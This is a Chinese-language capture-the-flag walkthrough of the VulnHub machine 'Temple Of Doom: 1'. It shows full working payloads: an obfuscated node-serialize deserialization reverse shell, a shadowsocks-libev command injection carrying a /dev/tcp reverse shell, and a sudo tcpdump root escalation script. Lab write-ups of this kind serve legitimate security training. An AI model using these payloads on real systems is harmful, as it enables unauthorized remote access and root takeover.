【Vulnhub通关】Temple Of Doom:1


准备工作

靶机基本信息

靶机名称:Temple Of Doom 1
操作系统:Linux
虚拟机软件:VirtualBox
网络连接方式:桥接至物理网络
渗透测试目标:获取靶机root权限和flag文件内容

下载地址:1. Temple of Doom: 1 ~ VulnHub

2. vulnhub靶机_免费高速下载|百度网盘-分享无限制(推荐VMware版)

环境配置

从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Temple_Of_Doom.ovf文件打开后即可导入靶机


信息收集

IP地址发现

在对靶机进行渗透之前,我们首先使用netdiscover对其进行IP地址探测:

shell 复制代码
netdiscover -r 192.168.2.0/24

可以发现靶机IP地址为192.168.2.131

防火墙探测

得知靶机IP地址之后,我们首先使用Ping对其进行网络连通性测试:

shell 复制代码
└─# ping -c 4 192.168.2.131
PING 192.168.2.131 (192.168.2.131) 56(84) bytes of data.
64 bytes from 192.168.2.131: icmp_seq=1 ttl=64 time=1.64 ms
64 bytes from 192.168.2.131: icmp_seq=2 ttl=64 time=0.902 ms
64 bytes from 192.168.2.131: icmp_seq=3 ttl=64 time=0.848 ms
64 bytes from 192.168.2.131: icmp_seq=4 ttl=64 time=0.871 ms

--- 192.168.2.131 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 0.848/1.064/1.637/0.331 ms

可以发现攻击机和靶机之间的连通性良好。

接下来我们尝试使用Nmap发现TCP ACK包对其进行网络防火墙探测:

shell 复制代码
┌──(root㉿attacker)-[/home/hacker]
└─# nmap -sA -p- 192.168.2.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 10:23 CST
Nmap scan report for 192.168.2.131 (192.168.2.131)
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.131 (192.168.2.131) are in ignored states.
Not shown: 65535 unfiltered tcp ports (reset)
MAC Address: 00:0C:29:D5:F5:FD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds

无法确定防火墙状态,直接进行网络端口扫描。

网络端口扫描

下面使用Nmap发送TCP SYN包,扫描靶机端口、软件版本和操作系统特征:

shell 复制代码
nmap -sS -sV -O -p- -oN ./tcp_result.txt 192.168.2.131
nmap -sC -sU -sV -T4 -oN ./udp_result.txt 192.168.2.131

TCP端口扫描结果

UDP端口扫描结果

可以看到靶机开放了如下端口:

端口 传输层协议 应用层协议 详细信息
22 TCP SSH OpenSSH 7.7 (protocol 2.0)
666 TCP HTTP Node.js Express framework

同时确定靶机操作系统内核版本大致为Linux 3.2 - 4.9


服务探测

SSH服务(22端口)

使用Netcat确定端口Banner信息:

shell 复制代码
┌──(root㉿attacker)-[/home/hacker/Documents/vulnhub_notes/temple_of_doom]
└─# nc -nv 192.168.2.131 22
(UNKNOWN) [192.168.2.131] 22 (ssh) open
SSH-2.0-OpenSSH_7.7

尝试使用ssh命令连接靶机的root用户,但靶机长时间未响应,判断靶机SSH服务已经损坏。

Web应用程序(666端口)

使用浏览器打开网站主页(刷新一次 ):http://192.168.2.131:666/

发现该页面调用了Node.Js反序列化模块怀疑存在反序列化漏洞。该页面的请求头如下:

text 复制代码
GET / HTTP/1.1
Host: 192.168.2.131:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Upgrade-Insecure-Requests: 1

Cookie的内容进行Base64解码后,发现内容如下:

text 复制代码
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}%3D

发现JSON内容中的Expires字段值前少了一个双引号。将其补全并进行Base64编码并发送后发现页面无报错,显示如下:

推测该页面的功能只是从Cookie中接收经Base64编码后序列化的JSON数组,对其进行反序列化后取出username元素中的值并将其拼接打印在页面上。


渗透测试

经过对已知信息的整理分析,最终决定尝试使用CVE-2017-5941漏洞对其进行渗透

我们使用Node.Js-Security-Course工具来生成反弹Shell的Node代码:

shell 复制代码
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
chmod -R 777 ./Node.Js-Security-Course
cd ./Node.Js-Security-Course
python2 ./nodejsshell.py 192.168.2.50 443

成功输出Payload:

接下来我们需要编写一段Node.Js代码将其序列化:

js 复制代码
var revshell = {
    rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,50,46,53,48,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}
}
var serialize = require('node-serialize');
console.log(serialize.serialize(revshell));

这段代码定义了恶意对象类revshell,然后引入了node-serialize序列化工具模块,随后将恶意类序列化之后打印输出。

执行结果如下:

我们将以上Payload复制到BurpSuite的编码器中,在JSON数组元素rce的字符串值末尾加上函数调用符号()后,将其进行Base64编码;随后在编码后的字符串末尾加上%3D后,将其作为请求Cookie进行发送;同时使用如下命令在本地443端口启动监听

shell 复制代码
rlwrap nc -lvnp 443

成功接收到反弹Shell:


权限提升

本地信息收集

在获得靶机低权限Shell时,我们可以上传LinPeas工具进行本地信息收集。

shell 复制代码
wget http://192.168.2.50:9000/linpeas.sh
chmod 700 ./linpeas.sh
./linpeas.sh

基本信息

用户信息

进程信息

计划任务信息

特殊权限文件

可以收集到如下信息:

  • 靶机的Web目录路径为/home/nodeadmin/.web
  • 靶机较高权限的用户有:rootnodeadminfireman
  • 靶机的操作系统内核版本较老,为Linux 4.16.3,Sudo版本为1.8.22b1
  • 用户fireman运行了一个进程,可执行文件路径为/usr/local/bin/ss-manager

ShadowSocks提权

发现了fireman用户进程的绝对路径之后,我们尝试执行该程序 (在命令后加-V尝试确定该程序的作用)

shell 复制代码
[nodeadmin@192 ~]$ /usr/local/bin/ss-manager -V
/usr/local/bin/ss-manager -V
 2024-01-27 21:03:36 ERROR: Unrecognized option: (null)

shadowsocks-libev 3.1.0

  maintained by Max Lv <max.c.lv@gmail.com> and Linus Yang <laokongzi@gmail.com>

  usage:

    ss-manager

       -s <server_host>           Host name or IP address of your remote server.
       -p <server_port>           Port number of your remote server.
       -l <local_port>            Port number of your local server.
       -k <password>              Password of your remote server.
......

可以发现该程序为代理软件ShadowSocks的主程序,版本为shadowsocks-libev 3.1.0

尝试查找关于该版本的漏洞:

shell 复制代码
searchsploit shadowsocks

可以看到正好有一个该版本的漏洞。查看:

text 复制代码
Proof of Concept
----------------
As passed configuration requests are getting executed, the following command
will create file "evil" in /tmp/ on the server:

nc -u 127.0.0.1 8839
    add: {"server_port":8003, "password":"test", "method":"||touch
/tmp/evil||"}

The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manage, as long as the malicious part of the configuration has not
been overwritten.

可以得知要复现该漏洞,首先需要使用Netcat连接靶机8839/udp端口,随后输入 add: {"server_port":8003, "password":"test", "method":"||<command>||"}并回车。

这里我们执行反弹Shell到攻击机80端口的命令:

shell 复制代码
[nodeadmin@192 ~]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}

可以看到成功提权至fireman用户:

TCPDump提权

切换回fireman用户的家目录,查看所有文件:

shell 复制代码
[fireman@192 root]$ cd ~
cd ~
[fireman@192 ~]$ ls -lA
ls -lA
total 36
-rw------- 1 fireman fireman 2151 Jun  7  2018 .bash_history
-rw-r--r-- 1 fireman fireman   18 Mar 15  2018 .bash_logout
-rw-r--r-- 1 fireman fireman  193 Mar 15  2018 .bash_profile
-rw-r--r-- 1 fireman fireman  231 Mar 15  2018 .bashrc
drwx------ 3 fireman fireman 4096 Jun  3  2018 .config
-rw------- 1 fireman fireman   16 Jun  3  2018 .esd_auth
drwxr-xr-x 4 fireman fireman 4096 Apr 25  2018 .mozilla
drwxrwxr-x 2 fireman fireman 4096 Jun  3  2018 .shadowsocks
drwx------ 2 fireman fireman 4096 Jun  2  2018 .ssh

尝试使用sudo -l命令查看可以运行哪些命令

shell 复制代码
[fireman@192 ~]$ sudo -l
sudo -l
Matching Defaults entries for fireman on 192:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on 192:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump

依次查询iptablesnmclitcpdump三条命令的提权方法,最后发现tcpdump命令可以使用如下方法提权:

大意是可以在某个目录下新建一个具有执行权限的恶意脚本文件,随后使用TCPDump命令的-z参数加载脚本文件执行。完整命令如下:

shell 复制代码
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <脚本文件路径> -Z root

这里我们执行反弹Shell命令到攻击机8000端口的命令。命令如下:

shell 复制代码
touch /tmp/getroot.sh
chmod 777 /tmp/getroot.sh
echo "#! /bin/bash" >> /tmp/getroot.sh
echo "bash -i >& /dev/tcp/192.168.2.50/8000 0>&1"
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/getroot.sh -Z root

成功!!


Flag文件展示

文件名称:flag.txt
文件路径:/root/flag.txt
文件大小:1.9 KiB
MD5:6f14ebde10f6a78a652a632f3b1cfae6
SHA256:cb56c037ed80a9504fc019ced4a5d85508f100e62bf2a474d4320f2554adcc6c

文件内容截图:


本次靶机渗透到此结束

相关推荐
哎呦没3 小时前
Spring Boot OA:企业办公自动化的高效路径
java·spring boot·后端
真心喜欢你吖3 小时前
Spring Boot与MyBatis-Plus的高效集成
java·spring boot·后端·spring·mybatis
2401_857636393 小时前
实验室管理技术革新:Spring Boot系统
数据库·spring boot·后端
2401_857600953 小时前
实验室管理流程优化:Spring Boot技术实践
spring boot·后端·mfc
2402_857589363 小时前
企业办公自动化:Spring Boot OA管理系统开发与实践
java·spring boot·后端
黑不溜秋的4 小时前
C++ 编程指南04 - 尽量编写静态类型安全的程序
开发语言·c++·安全
恬淡虚无真气从之4 小时前
go interface(接口)使用
开发语言·后端·golang
程序猿毕设源码分享网4 小时前
基于springboot停车场管理系统源码和论文
数据库·spring boot·后端
程序员学姐5 小时前
基于SpringBoot+Vue的高校社团管理系统
java·开发语言·vue.js·spring boot·后端·mysql·spring
.生产的驴5 小时前
Docker Seata分布式事务保护搭建 DB数据源版搭建 结合Nacos服务注册
数据库·分布式·后端·spring cloud·docker·容器·负载均衡